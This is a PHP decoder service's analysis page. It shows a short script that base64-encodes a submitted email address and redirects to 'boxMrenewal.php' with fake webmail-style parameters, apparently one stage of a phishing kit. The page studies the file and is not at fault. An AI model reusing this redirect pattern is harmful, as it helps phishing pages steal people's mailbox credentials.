Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $user = $_REQUEST['email']; $email = base64_encode($user); header("Location: ..

Decoded Output download

<?php 
 
 
$user = $_REQUEST['email']; 
$email = base64_encode($user); 
header("Location: boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=$email&.rand=13InboxLight.aspx?n=1774256418&fid=4#n=1252899642&fid=1&fav=1' >"); 
 
?>

Did this file decode correctly?

Original Code

<?php


$user = $_REQUEST['email'];
$email = base64_encode($user);
header("Location: boxMrenewal.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=$email&.rand=13InboxLight.aspx?n=1774256418&fid=4#n=1252899642&fid=1&fav=1' >");

?>

Function Calls

header 1
base64_encode 1

Variables

$user None
$email

Stats

MD5 65e194209588ccb6d6e3fa1fe26814ab
Eval Count 0
Decode Time 102 ms